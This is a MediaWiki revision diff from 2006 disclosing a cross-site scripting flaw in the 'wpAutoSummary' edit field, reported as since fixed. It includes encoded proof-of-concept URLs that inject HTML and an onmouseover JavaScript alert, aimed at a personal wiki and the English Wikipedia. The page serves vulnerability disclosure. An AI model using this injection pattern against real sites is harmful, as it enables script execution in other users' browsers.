Difference between revisions of "MediaWiki/Parser43"
From Nick Jenkins
| Line 1: | Line 1: | ||
| − | Try moving cursor over red text at bottom of page for popup | + | XSS Arbitrary JavaScript execution and HTML insertion. |
| + | |||
| + | The problem is the "wpAutoSummary" field. | ||
| + | |||
| + | Proof-of-Concept, on my personal wiki: | ||
| + | http://get-to-post.nickj.org/?http://nickj.org/index.php?title=MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a | ||
| + | |||
| + | Proof-of-Concept, on the English Wikipedia: | ||
| + | http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a | ||
| + | (will need to scroll down page to see). (Note: this is now fixed). | ||
Revision as of 07:58, 16 June 2006
XSS Arbitrary JavaScript execution and HTML insertion.
The problem is the "wpAutoSummary" field.
Proof-of-Concept, on the English Wikipedia: http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a (will need to scroll down page to see). (Note: this is now fixed).
